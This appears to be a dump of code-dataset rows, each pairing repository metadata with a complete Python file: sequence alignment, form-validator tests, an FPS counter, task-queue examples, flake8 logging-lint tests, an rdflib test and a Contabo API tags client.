| 34.31746 | 96 | 0.702128 | 282 | 2,162 | 5.202128 | 0.492908 | 0.0409 | 0.04908 | 0.021813 | 0.088616 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004499 | 0.177613 | 2,162 | 62 | 97 | 34.870968 | 0.820585 | 0.343201 | 0 | 0 | 0 | 0 | 0.092286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.225806 | 0.032258 | 0.451613 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b614594c792bcc71148ae6b00e42b3819d01bc79 | 6,582 | py | Python | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | null | null | null | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | 2 | 2018-04-25T22:13:34.000Z | 2018-04-26T17:52:43.000Z | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | null | null | null | import functools
from dtpattern.alignment.alignment_list import align_global, finalize, format_alignment2
from dtpattern.unicode_translate.uc_models import FIX_SYMB
from pyjuhelpers.timer import timer
class Alignment(object):
def __init__(self, alpha, beta, translate=None, m=6, mm=-4, om=3, csetm=4,go=-10, ge=-5):
self.alpha=alpha
self.beta=beta
self.data={}
self.m=m
self.mm=mm
self.om=om
self.go=go
self.csetm=csetm
self.ge=ge
self.translate = translate
self.find_best_alignment(alpha.symbol, beta.symbol)
def best(self):
return self.data['best'] if 'best' in self.data else None
@timer(key='best_align')
def find_best_alignment(self, alpha_list, beta_list):
score_matrix={
'match':self.m,
'csetmatch':self.csetm,
'optional_match':self.om,
'mismatch': self.mm,
'gapopen':self.go,
'gapextend':self.ge
}
aligns = align_global(alpha_list, beta_list, self.translate, **score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['raw']={ 'score':score, 'identity':identity,
'align1':align1,'align2':align2, 'symbol':symbol2
}
if 0< identity < 100:
#identtiy between 0 and 100 means that we have some matching characters
#translate the non matching symbols in alpha
ctrans = False
alpha_ct=[]
for sym in symbol2:
if isinstance(sym, str):
#str in align, means a match
alpha_ct.append(sym)
elif isinstance(sym, list):
#list indicates a align of two diff char or symb
if sym[0] != '':
if isinstance(sym[0],str):
ctrans = True
alpha_ct.append( FIX_SYMB( self.translate(sym[0]), 1) )
else:
alpha_ct.append( sym[0] )
# for i in range(0, len(align1)):
# if len(symbol2[i])==1:
# alpha_ct.append(align1[i])
# else:
# if symbol2[i][0] != '':
# if isinstance(symbol2[i][0],str):
# ctrans = True
# alpha_ct.append( FIX_SYMB(self.translate(symbol2[i][0]),1) )
# else:
# alpha_ct.append(symbol2[i][0])
if ctrans:
score_matrix = {
'match': self.m,
'csetmatch': self.m, # score cset match as full match, since we translated none matching characters to symbol
'optional_match': self.om,
'mismatch': self.mm,
'gapopen': self.go,
'gapextend': self.ge
}
aligns = align_global(alpha_ct, beta_list,self.translate, **score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['partl1'] = {
'score': score, 'identity': identity,
'align1': align1, 'align2': align2,
'symbol': symbol2
}
elif identity == 0:
#no matching characters:
alpha_ct = []
ctrans = False
for sym in alpha_list:
if isinstance(sym, str):
ctrans = True
alpha_ct.append( FIX_SYMB( self.translate(sym), 1) )
else:
alpha_ct.append( sym )
if ctrans:
score_matrix = {
'match': self.m,
'csetmatch': self.m, # uc match counts full
'optional_match': self.om,
'mismatch': self.mm,
'gapopen': self.go,
'gapextend': self.ge
}
aligns = align_global(alpha_ct, beta_list, self.translate,**score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['l1'] = {
'score': score, 'identity': identity,
'align1': align1, 'align2': align2,
'symbol': symbol2
}
if len(self.data) > 1:
def compare(item1, item2):
#identity before score
res = item1[1]['identity'] - item2[1]['identity']
if res == 0:
res = item1[1]['score'] - item2[1]['score']
return res
_s_al = sorted(enumerate(list(self.data.values())), key=functools.cmp_to_key(compare))
self.data['best'] = _s_al[-1][1]
else:
self.data['best'] = self.data['raw']
def __repr__(self):
s = "--ALIGNMENT: {} - {} --".format(repr(self.alpha), repr(self.beta))
s += "\n costs: m:{} mm:{} go:{} ge:{}".format(self.m,self.mm,self.go,self.ge)
for key, v in self.data.items():
identity, score, align1, symbol, align2= v['identity'],v['score'],v['align1'],v['symbol'],v['align2']
s+="\n {}\n{}".format(key,format_alignment2(identity, score, align1, symbol, align2, indent=2, translate=self.translate))
return s
def __str__(self):
s="--ALIGNMENT({},{},{},{}): {} - {} --".format(self.m,self.mm,self.go,self.ge,self.alpha, self.beta)
for key, v in self.data.items():
identity, score, align1, symbol, align2= v['identity'],v['score'],v['align1'],v['symbol'],v['align2']
s+=" \n[{:^8}] ident: {:6.2f} score: {:>3} SYM: {}".format(key, identity, score, symbol)
return s
def compare(item1, item2):
"""
compares first identity and if equals the score
:param item1:
:param item2:
:return:
"""
data1, data2 = item1[1], item2[1]
if data1 is None and data2 is None:
return 0
elif data1 is None and data2 is not None:
return -1
elif data1 is not None and data2 is None:
return +1
else:
res = data1.data['best']['identity'] - data2.data['best']['identity']
if res == 0:
res = data1.data['best']['score'] - data2.data['best']['score']
return res
| 37.186441 | 133 | 0.499696 | 734 | 6,582 | 4.393733 | 0.185286 | 0.032248 | 0.032248 | 0.018605 | 0.459535 | 0.43938 | 0.396589 | 0.386047 | 0.386047 | 0.368062 | 0 | 0.029199 | 0.370404 | 6,582 | 176 | 134 | 37.397727 | 0.749035 | 0.118201 | 0 | 0.475806 | 0 | 0 | 0.098107 | 0.004341 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056452 | false | 0 | 0.032258 | 0.008065 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3733a08138ec283d797445a7d27a5b19edaeec7d | 6,056 | py | Python | tests/test_validators.py | jpsca/pforms | 77c9da93e5224e79bb147aa873f28951e972bb21 | [
"MIT"
] | 2 | 2020-09-30T22:41:00.000Z | 2020-12-04T16:47:17.000Z | tests/test_validators.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | 2 | 2021-11-18T18:01:28.000Z | 2021-11-18T18:03:29.000Z | tests/test_validators.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | null | null | null | from datetime import date, datetime
import pytest
from proper_forms import Date, DateTime, Field, Integer
from proper_forms import validators as v
def test_confirmed_message():
validator = v.Confirmed()
assert validator.message == "Values doesn't match."
assert v.Confirmed(message="custom").message == "custom"
def test_longer_than_message():
validator = v.LongerThan(5)
assert validator.message == "Field must be at least 5 character long."
assert v.LongerThan(5, message="custom").message == "custom"
def test_shorter_than_message():
validator = v.ShorterThan(5)
assert validator.message == "Field cannot be longer than 5 characters."
assert v.ShorterThan(5, message="custom").message == "custom"
def test_less_than_message():
validator = v.LessThan(10)
assert validator.message == "Number must be less than 10."
assert v.LessThan(10, message="custom").message == "custom"
def test_more_than_message():
validator = v.MoreThan(10)
assert validator.message == "Number must be greater than 10."
assert v.MoreThan(10, message="custom").message == "custom"
def test_in_range_message():
validator = v.InRange(1900, 2010)
assert validator.message == "Number must be between 1900 and 2010."
assert v.InRange(1900, 2010, message="custom").message == "custom"
def test_before_message():
dt = datetime(2017, 7, 5)
validator = v.Before(dt)
assert validator.message == "Enter a valid date before 2017-07-05."
assert v.Before(dt, message="custom").message == "custom"
def test_after_message():
dt = datetime(2017, 7, 5)
validator = v.After(dt)
assert validator.message == "Enter a valid date after 2017-07-05."
assert v.After(dt, message="custom").message == "custom"
def test_before_now_message():
validator = v.BeforeNow()
assert validator.message == "Enter a valid date in the past."
assert v.BeforeNow(message="custom").message == "custom"
def test_after_now_message():
validator = v.AfterNow()
assert validator.message == "Enter a valid date in the future."
assert v.AfterNow(message="custom").message == "custom"
DATA = [
[Field, v.Confirmed(), ["password", "password"], True],
[Field, v.Confirmed(), ["password", "password", "password"], True],
[Field, v.Confirmed(), ["password"], False],
[Field, v.Confirmed(), ["lorem", "ipsum"], False],
[Field, v.Confirmed(), ["password", "nope", "password"], False],
[Field, v.LongerThan(5), ["123456789"], True],
[Field, v.LongerThan(5), ["12345"], True],
[Field, v.LongerThan(5), ["abc"], False],
[Field, v.LongerThan(5), ["123456789", "qwertyuiop", "lorem ipsum"], True],
[Field, v.LongerThan(5), ["123456789", "abc", "lorem ipsum"], False],
[Field, v.ShorterThan(5), ["123"], True],
[Field, v.ShorterThan(5), ["12345"], True],
[Field, v.ShorterThan(5), ["qwertyuiop"], False],
[Field, v.ShorterThan(5), ["1234", "abc", "lorem"], True],
[Field, v.ShorterThan(5), ["1234", "abcdefghijk", "lorem"], False],
[Integer, v.LessThan(10), ["8"], True],
[Integer, v.LessThan(10), ["10"], True],
[Integer, v.LessThan(10), ["34"], False],
[Integer, v.LessThan(10), ["4", "3", "5"], True],
[Integer, v.LessThan(10), ["4", "3", "25"], False],
[Integer, v.MoreThan(10), ["20"], True],
[Integer, v.MoreThan(10), ["-1"], False],
[Integer, v.MoreThan(10), ["20", "13", "25"], True],
[Integer, v.MoreThan(10), ["8", "13", "25"], False],
[Integer, v.InRange(1900, 2010), ["1979"], True],
[Integer, v.InRange(1900, 2010), ["1900"], True],
[Integer, v.InRange(1900, 2010), ["2010"], True],
[Integer, v.InRange(1900, 2010), ["1820"], False],
[Integer, v.InRange(1900, 2010), ["3000"], False],
[Integer, v.InRange(1900, 2010), ["-1"], False],
[Integer, v.InRange(1900, 2010), ["1979", "1984", "2009"], True],
[Integer, v.InRange(1900, 2010), ["1979", "1984", "2019"], False],
[Date, v.Before(datetime(2017, 7, 5)), ["1979-05-05"], True],
[Date, v.Before(datetime(2017, 7, 5)), ["2019-07-16"], False],
[Date, v.Before(date(2017, 7, 5)), ["1979-05-05"], True],
[Date, v.Before(date(2017, 7, 5)), ["2019-07-16"], False],
[Date, v.After(datetime(2017, 7, 5)), ["2019-07-16"], True],
[Date, v.After(datetime(2017, 7, 5)), ["1979-05-05"], False],
[Date, v.After(date(2017, 7, 5)), ["2019-07-16"], True],
[Date, v.After(date(2017, 7, 5)), ["1979-05-05"], False],
[Date, v.BeforeNow(), ["1821-07-28"], True],
[Date, v.BeforeNow(), ["3000-01-01"], False],
[Date, v.AfterNow(), ["3000-01-01"], True],
[Date, v.AfterNow(), ["1821-07-28"], False],
[DateTime, v.Before(datetime(2017, 7, 5)), ["1979-05-05"], True],
[DateTime, v.Before(datetime(2017, 7, 5)), ["2019-07-16"], False],
[DateTime, v.Before(date(2017, 7, 5)), ["1979-05-05"], True],
[DateTime, v.Before(date(2017, 7, 5)), ["2019-07-16"], False],
[DateTime, v.After(datetime(2017, 7, 5)), ["2019-07-16"], True],
[DateTime, v.After(datetime(2017, 7, 5)), ["1979-05-05"], False],
[DateTime, v.After(date(2017, 7, 5)), ["2019-07-16"], True],
[DateTime, v.After(date(2017, 7, 5)), ["1979-05-05"], False],
[DateTime, v.BeforeNow(), ["1821-07-28"], True],
[DateTime, v.BeforeNow(), ["3000-01-01"], False],
[DateTime, v.AfterNow(), ["3000-01-01"], True],
[DateTime, v.AfterNow(), ["1821-07-28"], False],
]
@pytest.mark.parametrize("FieldClass, validator, input_values, result", DATA)
def test_validators(FieldClass, validator, input_values, result):
field = FieldClass(validator)
field.input_values = input_values
assert bool(field.validate()) is result
DATE_VALIDATORS = [
v.Before(datetime(2017, 7, 5)),
v.After(datetime(2017, 7, 5)),
v.BeforeNow(),
v.AfterNow(),
]
@pytest.mark.parametrize("validator", DATE_VALIDATORS)
def test_fail_if_not_date(validator):
field = Integer(validator)
field.input_values = ["1979"]
with pytest.raises(AssertionError):
field.validate()
| 39.842105 | 79 | 0.62467 | 824 | 6,056 | 4.541262 | 0.137136 | 0.069482 | 0.032068 | 0.044896 | 0.665152 | 0.524319 | 0.370657 | 0.219669 | 0.181187 | 0.145377 | 0 | 0.115544 | 0.16397 | 6,056 | 151 | 80 | 40.10596 | 0.623543 | 0 | 0 | 0.016529 | 0 | 0 | 0.168758 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.099174 | false | 0.033058 | 0.033058 | 0 | 0.132231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3734bdeaee2424fb8a41b0e01dff10a01e85aac8 | 2,084 | py | Python | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
import rospy
import numpy as np
import threading
from timeit import default_timer as timer
import time
class FPS:
def __init__(self):
self.period_update = 0.2 # sec.
self.window_size = 25 # samples
self.max_cumulated_step = 100000
#
self.buffer_cumulated_stamp = [0 for _ in range(self.window_size)]
self.idx_now = self.correct_index(0)
#
self.cumulated_step = self.correct_step(0)
#
self.period_window = self.period_update * self.window_size
self.fps = 0.0
#------------------------#
self.stamp_start = timer()
self.stamp_last = self.stamp_start
_t = threading.Timer(self.period_update, self._worker)
_t.daemon = True
_t.start()
def step(self):
"""
"""
self.cumulated_step = self.correct_step(self.cumulated_step + 1)
def correct_index(self, index_in):
"""
"""
return int(index_in % self.window_size)
def correct_step(self, step_in):
"""
"""
return int(step_in % self.max_cumulated_step)
def _worker(self):
stamp_now = timer()
_t = threading.Timer(self.period_update, self._worker)
_t.daemon = True
_t.start()
# Pop out old one
step_pre = self.buffer_cumulated_stamp[self.idx_now]
# Push new one
self.buffer_cumulated_stamp[self.idx_now] = self.cumulated_step
# Calculate the difference
_step_diff = self.buffer_cumulated_stamp[self.idx_now] - step_pre
_step_diff = self.correct_step(_step_diff)
# Calculate FPS
self.fps = _step_diff / float(self.period_window)
# next step
self.idx_now = self.correct_index(self.idx_now + 1)
# print("fps = %f" % self.fps)
_delta_T = stamp_now - self.stamp_last
self.stamp_last = stamp_now
# print("Hey %s sec." % str(_delta_T))
if __name__ == "__main__":
fps = FPS()
while True:
fps.step()
time.sleep(0.3)
| 26.717949 | 74 | 0.596929 | 268 | 2,084 | 4.313433 | 0.283582 | 0.051903 | 0.051903 | 0.083045 | 0.32699 | 0.288927 | 0.188581 | 0.100346 | 0.100346 | 0.100346 | 0 | 0.013541 | 0.291267 | 2,084 | 77 | 75 | 27.064935 | 0.769127 | 0.096929 | 0 | 0.136364 | 0 | 0 | 0.004391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.113636 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3735790497e156cdee39aed5c0df2ddf1799e05b | 2,966 | py | Python | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | import asyncio
import logging
import arrlio
import tasks
from arrlio import crypto
from arrlio.serializer.json import CryptoJson
logger = logging.getLogger("arrlio")
logger.setLevel("INFO")
BACKEND = "arrlio.backend.local"
async def main():
async def example_1():
producer = arrlio.Producer(arrlio.ProducerConfig(backend=BACKEND))
consumer = arrlio.Consumer(arrlio.ConsumerConfig(backend=BACKEND))
async with producer, consumer:
await consumer.consume_tasks()
# call by task
ar = await producer.send_task(tasks.hello_world)
logger.info(await ar.get())
# call by task name
ar = await producer.send_task("foo")
logger.info(await ar.get())
# task bind example
ar = await producer.send_task(tasks.bind)
logger.info(await ar.get())
# exception
try:
ar = await producer.send_task(tasks.exception)
logger.info(await ar.get())
except Exception as e:
print(f"\nThis is example exception for {producer.backend}:\n")
logger.exception(e)
print()
async def example_2():
pri_key = crypto.generate_private_key()
pub_key = pri_key.public_key()
def serializer():
return CryptoJson(
encryptor=lambda x: crypto.a_encrypt(x, pub_key),
decryptor=lambda x: crypto.a_decrypt(x, pri_key),
)
backend_config_kwds = {"serializer": serializer}
consumer = arrlio.Consumer(
arrlio.ConsumerConfig(backend=BACKEND),
backend_config_kwds=backend_config_kwds,
)
producer = arrlio.Producer(
arrlio.ProducerConfig(backend=BACKEND),
backend_config_kwds=backend_config_kwds,
)
async with producer, consumer:
await consumer.consume_tasks()
ar = await producer.send_task(tasks.hello_world, encrypt=True, result_encrypt=True)
logger.info(await ar.get())
async def example_3():
graph = arrlio.Graph("My Graph")
graph.add_node("A", tasks.add_one, root=True)
graph.add_node("B", tasks.add_one)
graph.add_node("C", tasks.add_one)
graph.add_edge("A", "B")
graph.add_edge("B", "C")
producer = arrlio.Producer(arrlio.ProducerConfig(backend=BACKEND))
consumer = arrlio.Consumer(arrlio.ConsumerConfig(backend=BACKEND))
async with producer, consumer:
await consumer.consume_tasks()
ars = await producer.send_graph(graph, args=(0,))
logger.info("A: %i", await ars["A"].get())
logger.info("B: %i", await ars["B"].get())
logger.info("C: %i", await ars["C"].get())
await example_1()
await example_2()
await example_3()
if __name__ == "__main__":
asyncio.run(main())
| 30.265306 | 95 | 0.599798 | 342 | 2,966 | 5.04386 | 0.248538 | 0.064928 | 0.05913 | 0.055072 | 0.491014 | 0.397681 | 0.365217 | 0.316522 | 0.187826 | 0.187826 | 0 | 0.003322 | 0.289616 | 2,966 | 97 | 96 | 30.57732 | 0.815377 | 0.019555 | 0 | 0.246377 | 0 | 0 | 0.047193 | 0.007234 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014493 | false | 0 | 0.086957 | 0.014493 | 0.115942 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37369717bf4744bf752a9e5e1db557ed280d3c7a | 496 | py | Python | Blatt-02/Sonstiges/tribonacci.py | MartinThoma/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | 1 | 2017-08-10T13:12:03.000Z | 2017-08-10T13:12:03.000Z | Blatt-02/Sonstiges/tribonacci.py | siviaseason/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | null | null | null | Blatt-02/Sonstiges/tribonacci.py | siviaseason/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | 2 | 2016-06-08T20:56:04.000Z | 2022-03-11T20:12:37.000Z | def tribonacci(n):
if n < 3:
return n
else:
return tribonacci(n-1) + tribonacci(n-2) + tribonacci(n-3)
def tribonacciBottomUp(n):
last = 1
secondLast = 1
thirdLast = 1
for i in range(2,n):
new = last + secondLast + thirdLast
thirdLast = secondLast
secondLast = last
last = new
return last
def fillIt(n):
solutions
for i in xrange(0,40+1):
print("<tr><td>%i</td><td>%i</td></tr>" % (i, tribonacciBottomUp(i)))
| 21.565217 | 73 | 0.568548 | 69 | 496 | 4.086957 | 0.376812 | 0.156028 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034286 | 0.294355 | 496 | 22 | 74 | 22.545455 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0 | 0 | 0.315789 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37379882a0e02a3d332d5d8f259eede951ecb249 | 1,805 | py | Python | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-pie | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
] | 23 | 2019-01-25T14:58:20.000Z | 2022-03-27T02:20:01.000Z | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-assign-and-return | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
] | 50 | 2019-04-17T02:37:01.000Z | 2022-03-27T02:19:53.000Z | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-assign-and-return | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
] | 5 | 2019-02-21T07:29:12.000Z | 2021-11-06T21:01:26.000Z | from __future__ import annotations
import ast
import pytest
from flake8_pie import Flake8PieCheck
from flake8_pie.pie803_prefer_logging_interpolation import PIE803
from flake8_pie.tests.utils import Error, ex, to_errors
EXAMPLES = [
ex(
code=r"""
logger.info("Login error for %s" % user)
""",
errors=[PIE803(lineno=2, col_offset=12)],
),
ex(
code=r"""
log.warn("Login error for %s, %s" % (user_id, name))
""",
errors=[PIE803(lineno=2, col_offset=9)],
),
ex(
code=r"""
logging.log("Login error for {}".format(user))
""",
errors=[PIE803(lineno=2, col_offset=12)],
),
ex(
code=r"""
logging.log(logging.DEBUG, "Login error for {}".format(user))
""",
errors=[PIE803(lineno=2, col_offset=27)],
),
ex(
code=r"""
logger.debug("Login error for {}, {}".format(user_id, name))
""",
errors=[PIE803(lineno=2, col_offset=13)],
),
ex(
code=r"""
logger.critical(f"Login error for {user}")
""",
errors=[PIE803(lineno=2, col_offset=16)],
),
ex(
code=r"""
log.info(f"Login error for {user:0.2f}")
""",
errors=[PIE803(lineno=2, col_offset=9)],
),
ex(
code=r"""
self.logger.critical(f"Login error for {user}, {userid}")
""",
errors=[PIE803(lineno=2, col_offset=21)],
),
ex(
code=r"""
self.log.exception(f"Login error for")
logger.info("Login error for %s", user)
log.info("Login error for %s, %s", user_id, name)
""",
errors=[],
),
]
@pytest.mark.parametrize("code,errors", EXAMPLES)
def test_prefer_logging_interpolation(code: str, errors: list[Error]) -> None:
expr = ast.parse(code)
assert to_errors(Flake8PieCheck(expr, filename="foo.py").run()) == errors
| 24.066667 | 78 | 0.587812 | 239 | 1,805 | 4.330544 | 0.271967 | 0.10628 | 0.138164 | 0.14686 | 0.542029 | 0.501449 | 0.446377 | 0.307246 | 0.307246 | 0.216425 | 0 | 0.042569 | 0.232133 | 1,805 | 74 | 79 | 24.391892 | 0.704185 | 0 | 0 | 0.588235 | 0 | 0 | 0.330748 | 0.057064 | 0 | 0 | 0 | 0 | 0.014706 | 1 | 0.014706 | false | 0 | 0.088235 | 0 | 0.102941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373b0831f54ef02bac3d59c0fc65db6ad11950d7 | 1,517 | py | Python | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | 6 | 2021-11-22T19:10:32.000Z | 2022-01-31T19:16:37.000Z | test/test_graph/test_slice.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | from test.data import bob, cheese, hates, likes, michel, pizza, tarek
from rdflib import Graph
class TestGraphSlice:
def test_slice(self):
"""
We pervert the slice object,
and use start, stop, step as subject, predicate, object
all operations return generators over full triples
"""
def sl(x, y):
return len(list(x)) == y
def soe(x, y):
return set([a[2] for a in x]) == set(y) # equals objects
g = Graph()
g.add((tarek, likes, pizza))
g.add((tarek, likes, cheese))
g.add((michel, likes, pizza))
g.add((michel, likes, cheese))
g.add((bob, likes, cheese))
g.add((bob, hates, pizza))
g.add((bob, hates, michel)) # gasp!
# Single terms are all trivial:
# single index slices by subject, i.e. return triples((x,None,None))
# tell me everything about "tarek"
sl(g[tarek], 2)
# single slice slices by s,p,o, with : used to split
# tell me everything about "tarek" (same as above)
sl(g[tarek::], 2)
# give me every "likes" relationship
sl(g[:likes:], 5)
# give me every relationship to pizza
sl(g[::pizza], 3)
# give me everyone who likes pizza
sl(g[:likes:pizza], 2)
# does tarek like pizza?
assert g[tarek:likes:pizza] is True
# More intesting is using paths
# everything hated or liked
sl(g[: hates | likes], 7)
| 27.089286 | 76 | 0.556361 | 209 | 1,517 | 4.033493 | 0.45933 | 0.033215 | 0.032028 | 0.053381 | 0.104389 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006843 | 0.325643 | 1,517 | 55 | 77 | 27.581818 | 0.817204 | 0.376401 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.130435 | false | 0 | 0.086957 | 0.086957 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
373cd2d11dd4c527255309c855c5dbf16d3610fd | 2,163 | py | Python | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 5 | 2022-01-03T10:34:35.000Z | 2022-01-27T10:34:41.000Z | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 4 | 2022-01-14T10:37:57.000Z | 2022-01-20T20:44:54.000Z | pyContabo/Tags.py | xLeon-python/pyContabo | 9863bd1ab0f95b50186902c90c40ce53d3026afd | [
"MIT"
] | 1 | 2022-01-20T14:59:32.000Z | 2022-01-20T14:59:32.000Z | import json
from typing import List, Union
from .Tag import Tag
from .audits.TagsAudits import TagsAudits
class Tags:
def __init__(self, _http):
self._http = _http
self.Audits = TagsAudits(_http)
def get(
self,
id: str = None,
page: int = None,
pageSize: int = None,
orderBy: str = None,
name: str = None,
x_request_id: str = None,
x_trace_id: str = None,
) -> Union[Tag, List[Tag]]:
"""gets any tag by id or other parameters through the paging system"""
if id:
resp = self._http.request(
type="get",
url=f"https://api.contabo.com/v1/tags/{id}",
x_request_id=x_request_id,
x_trace_id=x_trace_id,
)
if resp.status_code == 404:
return []
return Tag(resp.json()["data"][0], self._http)
else:
url = f"https://api.contabo.com/v1/tags?{f'page={page}&' if page is not None else ''}{f'size={pageSize}&' if pageSize is not None else ''}{f'orderBy={orderBy}&' if orderBy is not None else ''}{f'name={name}&' if name is not None else ''}"
url = url[:-1] # Remove the "?" at the end of the url
resp = self._http.request(
type="get", url=url, x_request_id=x_request_id, x_trace_id=x_trace_id
)
data = resp.json()["data"]
if len(data) == 0:
return []
tags = []
for i in resp.json()["data"]:
tags.append(Tag(i, self._http))
return tags
def create(
self, name: str, color: str, x_request_id: str = None, x_trace_id: str = None
) -> bool:
"""creates new tag using name and color"""
data = json.dumps({"name": name, "color": color})
resp = self._http.request(
type="post",
url=f"https://api.contabo.com/v1/tags",
data=data,
x_request_id=x_request_id,
x_trace_id=x_trace_id,
)
if resp.status_code == 201:
return True
return False
